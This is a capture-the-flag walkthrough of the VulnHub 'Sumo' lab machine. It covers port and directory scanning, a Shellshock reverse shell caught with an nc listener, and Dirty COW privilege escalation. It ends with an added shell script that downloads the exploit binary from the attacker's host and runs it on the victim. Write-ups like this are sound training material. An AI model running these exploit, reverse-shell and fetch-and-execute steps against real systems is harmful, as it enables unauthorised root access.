Today we are going to hack the VulnHub machine called
Sumo. You can download it from the following link:
Sumo
Video
Enumeration
We start with an nmap scan of all TCP ports (-p-) with version
detection and default scripts (-A) to see what is open.
sml@Cassandra:~$ nmap -A -p- 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST
Nmap scan report for ubuntu.home (192.168.1.104)
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds
Let's see if we can find anything on port 80...
A first dirb pass against the site root turned up the /cgi-bin
directory, so let's see if there is anything more inside it:
sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 16 12:44:01 2020
URL_BASE: http://192.168.1.104/cgi-bin/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.104/cgi-bin/ ----
+ http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14)
---------------
END_TIME: Sat May 16 12:44:14 2020
DOWNLOADED: 20458 - FOUND: 1
We find /cgi-bin/test... Apache 2.2.22 and OpenSSH 5.9p1 point to an Ubuntu 12.04 box,
old enough that its bash may still import function definitions from environment variables,
so let's try Shellshock (CVE-2014-6271) against the CGI script.
sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'
Privilege Escalation
Once inside we see that the system runs a fairly old kernel, so we try the Dirty COW
exploit (CVE-2016-5195), a race in the kernel's copy-on-write handling that lets an
unprivileged user write into read-only mappings, SUID binaries included. Worth checking
first: `uname -r` should show a kernel older than the October 2016 fixes (2.6.22 up to the
unpatched 3.x/4.x series were affected), and this particular PoC overwrites a SUID binary
after copying it to /tmp/bak, so keep that backup and expect the race to occasionally hang the VM.
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
We download it and compile it on our own machine!
sml@Cassandra:~$ wget https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
--2020-05-17 15:48:15-- https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.132.133
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)[151.101.132.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4368 (4.3K) [text/plain]
Saving to: ‘c0w.c’
c0w.c 100%[======================>] 4.27K --.-KB/s in 0s
2020-05-17 15:48:16 (25.2 MB/s) - ‘c0w.c’ saved [4368/4368]
sml@Cassandra:~$ gcc -pthread c0w.c -o c0w
c0w.c: In function ‘main’:
c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you
mean ‘vsprintf’? [-Wimplicit-function-declaration]
103 | asprintf(&backup, "cp %s /tmp/bak", suid_binary);
| ^~~~~~~~
| vsprintf
c0w.c:104:3: warning: implicit declaration of function ‘system’
[-Wimplicit-function-declaration]
104 | system(backup);
| ^~~~~~
sml@Cassandra:~$ cp c0w /var/www/html
Once compiled, we place the binary in our web server's root so we can download it
from the "victim" machine. The two implicit-declaration warnings are harmless for this
build (asprintf needs _GNU_SOURCE defined before <stdio.h>, and system lives in <stdlib.h>);
what does matter is that the build fits the target: compile for the victim's architecture
and, since its libc is older than ours, consider linking statically with -static so the
binary does not die on a missing GLIBC symbol version.
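Hosting the binary is only half of the transfer; the victim side is shown below as an added example that is not code from the original post. It downloads c0w from the attacker's web root, refuses to run it if the SHA-256 does not match the digest taken before upload or if the ELF class does not fit the target's architecture (the binary was built on the attacker's box, not on the victim), and reminds you to restore the SUID binary that c0w.c copies to /tmp/bak. ATTACKER_URL, EXPECTED_SHA256 and SUID_BIN are assumptions; the post shows neither the download step nor the binary the PoC patches.

```shell
#!/bin/sh
# Victim-side half of the transfer: fetch the c0w binary from the attacker's web
# root, verify it, and only then run it. Added example, not code from the post;
# ATTACKER_URL, EXPECTED_SHA256 and SUID_BIN are assumptions (the post shows the
# binary copied to /var/www/html but neither the download nor the target binary).
set -u

ATTACKER_URL=${ATTACKER_URL:-http://192.168.1.148/c0w}
EXPECTED_SHA256=${EXPECTED_SHA256:-}      # output of: sha256sum c0w  (attacker side)
SUID_BIN=${SUID_BIN:-/usr/bin/passwd}     # assumed value of suid_binary in c0w.c

# ELF class byte at offset 4: 1 = 32-bit, 2 = 64-bit; prints 0 if not an ELF file.
elf_class() {   # $1 = path
  magic=$(od -An -N4 -tx1 "$1" | tr -d ' \n')
  if [ "$magic" != "7f454c46" ]; then echo 0; return; fi
  od -An -j4 -N1 -tu1 "$1" | tr -d ' \n'
}

# The exploit was built on the attacker's box; a 64-bit build will not run on a
# 32-bit victim (and vice versa), so compare the ELF class with uname -m.
arch_matches() {   # $1 = ELF class, $2 = output of uname -m
  case "$2" in
    x86_64|aarch64) [ "$1" = 2 ] ;;
    i?86|armv*)     [ "$1" = 1 ] ;;
    *)              return 1 ;;
  esac
}

# Refuse to run a binary whose hash differs from the one taken before upload:
# a truncated download of a kernel exploit is a good way to crash the box.
hash_matches() {   # $1 = path, $2 = expected hex digest
  [ -n "$2" ] && [ "$(sha256sum "$1" | cut -d' ' -f1)" = "$2" ]
}

fetch_and_run() {
  cd /tmp || return 1
  wget -q "$ATTACKER_URL" -O c0w || { echo "[-] download failed"; return 1; }
  hash_matches c0w "$EXPECTED_SHA256" || { echo "[-] hash mismatch or EXPECTED_SHA256 unset"; return 1; }
  arch_matches "$(elf_class c0w)" "$(uname -m)" || { echo "[-] ELF class does not match $(uname -m)"; return 1; }
  chmod +x c0w
  echo "[*] c0w copies $SUID_BIN to /tmp/bak before patching it (see the asprintf line in the build warnings)."
  echo "[*] From the root shell, restore it with: cp /tmp/bak $SUID_BIN"
  ./c0w
}

# Run only when asked, so the helper functions can be sourced or tested.
if [ "${1:-}" = run ]; then fetch_and_run; fi
```

On the attacker side record `sha256sum c0w` next to the `cp c0w /var/www/html`, then on the victim run `EXPECTED_SHA256=<digest> sh fetch_c0w.sh run`. The restore has to happen from inside the root shell the exploit spawns: once it exits you are www-data again and can no longer write to the patched binary.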